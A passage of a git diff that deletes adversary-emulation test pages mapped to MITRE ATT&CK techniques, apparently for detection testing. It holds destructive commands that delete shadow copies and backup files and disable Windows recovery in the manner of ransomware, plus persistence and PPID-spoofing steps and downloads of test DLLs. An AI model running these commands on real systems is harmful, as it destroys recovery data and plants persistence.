-execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
-will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
-confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
-
-https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-vssadmin.exe delete shadows /all /quiet
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
-##### Check Prereq Commands:
-```powershell
-if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 } 
-```
-##### Get Prereq Commands:
-```powershell
-vssadmin.exe create shadow /for=c:
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
-Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-Shadow copies can only be created on Windows server or Windows 8.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-wmic.exe shadowcopy delete
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Windows - Delete Windows Backup Catalog
-Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
-"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-wbadmin.exe delete catalog -quiet
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
-Upon execution, "The operation completed successfully." will be displayed in the powershell session.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
-bcdedit.exe /set {default} recoveryenabled no
-```
-
-#### Cleanup Commands:
-```cmd
-bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
-bcdedit.exe /set {default} recoveryenabled yes
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
-Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
-This technique is used by numerous ransomware families such as Sodinokibi/REvil.
-Executes Get-WMIObject. Shadow copies can only be created on Windows server or Windows 8, so upon execution
-there may be no output displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Windows - Delete Backup Files
-Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
-to delete files from around the system.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1496.md b/Atomic_Threat_Coverage/Triggers/T1496.md
deleted file mode 100644
index e4dff5b..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1496.md
+++ /dev/null
@@ -1,36 +0,0 @@
-# T1496 - Resource Hijacking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1496)
-<blockquote>Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. 
-
-One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes](#atomic-test-1---macoslinux---simulate-cpu-load-with-yes)
-
-
-<br/>
-
-## Atomic Test #1 - macOS/Linux - Simulate CPU Load with Yes
-This test simulates a high CPU load as you might observe during cryptojacking attacks.
-End the test by using CTRL/CMD+C to break.
-
-**Supported Platforms:** macOS, Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-yes > /dev/null
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1500.md b/Atomic_Threat_Coverage/Triggers/T1500.md
deleted file mode 100644
index 58b6789..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1500.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# T1500 - Compile After Delivery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1500)
-<blockquote>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
-
-Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
-</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Compile After Delivery using csc.exe](#atomic-test-1---compile-after-delivery-using-cscexe)
-
-
-<br/>
-
-## Atomic Test #1 - Compile After Delivery using csc.exe
-Compile C# code using csc.exe binary used by .NET
-Upon execution an exe named T1500.exe will be placed in the temp folder
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder&#92;T1500&#92;src&#92;calc.cs|
-| output_file | Output compiled binary | Path | C:&#92;Windows&#92;Temp&#92;T1500.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{output_file} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: C# file must exist on disk at specified location (#{input_file})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{input_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1500/src/calc.cs" -OutFile "#{input_file}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1501.md b/Atomic_Threat_Coverage/Triggers/T1501.md
deleted file mode 100644
index d961e09..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1501.md
+++ /dev/null
@@ -1,78 +0,0 @@
-# T1501 - Systemd Service
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1501)
-<blockquote>Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.
-
-Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories and have the file extension <code>.service</code>. Each service unit file may contain numerous directives that can execute system commands. 
-
-* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. 
-* ExecReload directive covers when a service restarts. 
-* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.
-
-Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)
-
-While adversaries typically require root privileges to create/modify service unit files in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories, low privilege users can create/modify service unit files in directories such as <code>~/.config/systemd/user/</code> to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service)
-
-
-<br/>
-
-## Atomic Test #1 - Create Systemd Service
-This test creates a Systemd service unit file and enables it as a service.
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| execstart_action | ExecStart action for Systemd service | String | /bin/touch /tmp/art-systemd-execstart-marker|
-| execstartpre_action | ExecStartPre action for Systemd service | String | /bin/touch /tmp/art-systemd-execstartpre-marker|
-| execstartpost_action | ExecStartPost action for Systemd service | String | /bin/touch /tmp/art-systemd-execstartpost-marker|
-| execreload_action | ExecReload action for Systemd service | String | /bin/touch /tmp/art-systemd-execreload-marker|
-| execstop_action | ExecStop action for Systemd service | String | /bin/touch /tmp/art-systemd-execstop-marker|
-| execstoppost_action | ExecStopPost action for Systemd service | String | /bin/touch /tmp/art-systemd-execstoppost-marker|
-| systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
-| systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
-echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
-echo "" >> #{systemd_service_path}/#{systemd_service_file}
-echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
-echo "Type=simple"
-echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
-echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
-echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
-echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
-echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
-echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
-echo "" >> #{systemd_service_path}/#{systemd_service_file}
-echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
-echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
-systemctl daemon-reload
-systemctl enable #{systemd_service_file}
-systemctl start #{systemd_service_file}
-```
-
-#### Cleanup Commands:
-```bash
-systemctl stop #{systemd_service_file}
-systemctl disable #{systemd_service_file}
-rm -rf #{systemd_service_path}/#{systemd_service_file}
-systemctl daemon-reload
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1502.md b/Atomic_Threat_Coverage/Triggers/T1502.md
deleted file mode 100644
index fed5952..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1502.md
+++ /dev/null
@@ -1,70 +0,0 @@
-# T1502 - Parent PID Spoofing
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1502)
-<blockquote>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
-
-Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Execution through API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
-
-Explicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Parent PID Spoofing using PowerShell](#atomic-test-1---parent-pid-spoofing-using-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Parent PID Spoofing using PowerShell
-This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.
-Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and
-calc.exe will be launched.
-
-Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| parent_process_name | Name of the parent process | string | explorer|
-| dll_path | Path of the dll to inject | path | PathToAtomicsFolder&#92;T1502&#92;bin&#92;calc.dll|
-| dll_process_name | Name of the created process from the injected dll | string | calculator|
-| spawnto_process_path | Path of the process to spawn | path | C:&#92;Program Files&#92;Internet Explorer&#92;iexplore.exe|
-| spawnto_process_name | Name of the process to spawn | string | iexplore|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-. $PathToAtomicsFolder\T1502\src\PPID-Spoof.ps1
-$ppid=Get-Process #{parent_process_name} | select -expand id
-PPID-Spoof -ppid $ppid -spawnto "#{spawnto_process_path}" -dllpath "#{dll_path}"
-```
-
-#### Cleanup Commands:
-```powershell
-Stop-Process -Name "#{dll_process_name}" -ErrorAction Ignore
-Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: DLL to inject must exist on disk at specified location (#{dll_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1502/bin/calc.dll" -OutFile "#{dll_path}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1504.md b/Atomic_Threat_Coverage/Triggers/T1504.md
deleted file mode 100644
index 7e24322..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1504.md
+++ /dev/null
@@ -1,62 +0,0 @@
-# T1504 - PowerShell Profile
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1504)
-<blockquote>Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile  (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
-
-Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
-
-An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Append malicious start-process cmdlet](#atomic-test-1---append-malicious-start-process-cmdlet)
-
-
-<br/>
-
-## Atomic Test #1 - Append malicious start-process cmdlet
-Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| exe_path | Path the malicious executable | Path | calc.exe|
-| ps_profile | Powershell profile to use | String | $profile|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Add-Content #{ps_profile} -Value ""
-Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
-powershell -Command exit
-```
-
-#### Cleanup Commands:
-```powershell
-$oldprofile = cat $profile | Select-Object -skiplast 1
-Set-Content $profile -Value $oldprofile
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Ensure a powershell profile exists for the current user
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{ps_profile}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{ps_profile} -Type File -Force
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1505.md b/Atomic_Threat_Coverage/Triggers/T1505.md
deleted file mode 100644
index cfe2b1e..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1505.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# T1505 - Server Software Component
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1505)
-<blockquote>Adversaries may abuse legitimate extensible development features of server applications to establish persistent access to systems. Enterprise server applications may include features that allow application developers to write and install software to extend the functionality of the main application. Adversaries may install malicious software components to maliciously extend and abuse server applications.
-
-###Transport Agent
-Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.
-
-Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.
-
-###SQL Stored Procedures
-SQL stored procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as <code>xp_cmdshell</code> for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017)
-
-Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures, these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Install MS Exchange Transport Agent Persistence](#atomic-test-1---install-ms-exchange-transport-agent-persistence)
-
-
-<br/>
-
-## Atomic Test #1 - Install MS Exchange Transport Agent Persistence
-Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla.
-More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| transport_agent_identity | Friendly name of transport agent once installed. | string | Security Interop Agent|
-| dll_path | Path of DLL to use as transport agent. | path | c:&#92;program files&#92;microsoft&#92;Exchange Server&#92;v15&#92;bin&#92;Microsoft.Exchange.Security.Interop.dll|
-| class_factory | Class factory of transport agent. | string | Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}
-Enable-TransportAgent #{transport_agent_identity}
-Get-TransportAgent | Format-List Name,Enabled
-```
-
-#### Cleanup Commands:
-```powershell
-Disable-TransportAgent #{transport_agent_identity}
-Uninstall-TransportAgent #{transport_agent_identity}
-Get-TransportAgent
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Microsoft Exchange SnapIn must be installed
-##### Check Prereq Commands:
-```powershell
-Get-TransportAgent -TransportService FrontEnd 
-```
-##### Get Prereq Commands:
-```powershell
-Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1518.md b/Atomic_Threat_Coverage/Triggers/T1518.md
deleted file mode 100644
index b22d2b7..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1518.md
+++ /dev/null
@@ -1,62 +0,0 @@
-# T1518 - Software Discovery
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1518)
-<blockquote>Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Find and Display Internet Explorer Browser Version](#atomic-test-1---find-and-display-internet-explorer-browser-version)
-
-- [Atomic Test #2 - Applications Installed](#atomic-test-2---applications-installed)
-
-
-<br/>
-
-## Atomic Test #1 - Find and Display Internet Explorer Browser Version
-Query the registry to determine the version of internet explorer installed on the system.
-Upon execution, version information about internet explorer will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Applications Installed
-Query the registry to determine software and versions installed on the system. Upon execution a table of
-software name and version information will be displayed.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
-Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1519.md b/Atomic_Threat_Coverage/Triggers/T1519.md
deleted file mode 100644
index 513bc6a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1519.md
+++ /dev/null
@@ -1,46 +0,0 @@
-# T1519 - Emond
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1519)
-<blockquote>Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
-
-Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1160) service.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Persistance with Event Monitor - emond](#atomic-test-1---persistance-with-event-monitor---emond)
-
-
-<br/>
-
-## Atomic Test #1 - Persistance with Event Monitor - emond
-Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| plist | Path to attacker emond plist file | path | PathToAtomicsFolder/T1519/src/T1519_emond.plist|
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-sudo cp "#{plist}" /etc/emond.d/rules/T1519_emond.plist
-sudo touch /private/var/db/emondClients/T1519
-```
-
-#### Cleanup Commands:
-```sh
-sudo rm /etc/emond.d/rules/T1519_emond.plist
-sudo rm /private/var/db/emondClients/T1519
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1529.md b/Atomic_Threat_Coverage/Triggers/T1529.md
deleted file mode 100644
index 44d86d8..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1529.md
+++ /dev/null
@@ -1,263 +0,0 @@
-# T1529 - System Shutdown/Reboot
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1529)
-<blockquote>Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
-
-Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Shutdown System - Windows](#atomic-test-1---shutdown-system---windows)
-
-- [Atomic Test #2 - Restart System - Windows](#atomic-test-2---restart-system---windows)
-
-- [Atomic Test #3 - Restart System via `shutdown` - macOS/Linux](#atomic-test-3---restart-system-via-shutdown---macoslinux)
-
-- [Atomic Test #4 - Shutdown System via `shutdown` - macOS/Linux](#atomic-test-4---shutdown-system-via-shutdown---macoslinux)
-
-- [Atomic Test #5 - Restart System via `reboot` - macOS/Linux](#atomic-test-5---restart-system-via-reboot---macoslinux)
-
-- [Atomic Test #6 - Shutdown System via `halt` - Linux](#atomic-test-6---shutdown-system-via-halt---linux)
-
-- [Atomic Test #7 - Reboot System via `halt` - Linux](#atomic-test-7---reboot-system-via-halt---linux)
-
-- [Atomic Test #8 - Shutdown System via `poweroff` - Linux](#atomic-test-8---shutdown-system-via-poweroff---linux)
-
-- [Atomic Test #9 - Reboot System via `poweroff` - Linux](#atomic-test-9---reboot-system-via-poweroff---linux)
-
-
-<br/>
-
-## Atomic Test #1 - Shutdown System - Windows
-This test shuts down a Windows system.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| timeout | Timeout period before shutdown (seconds) | string | 1|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-shutdown /s /t #{timeout}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Restart System - Windows
-This test restarts a Windows system.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| timeout | Timeout period before restart (seconds) | string | 1|
-
-
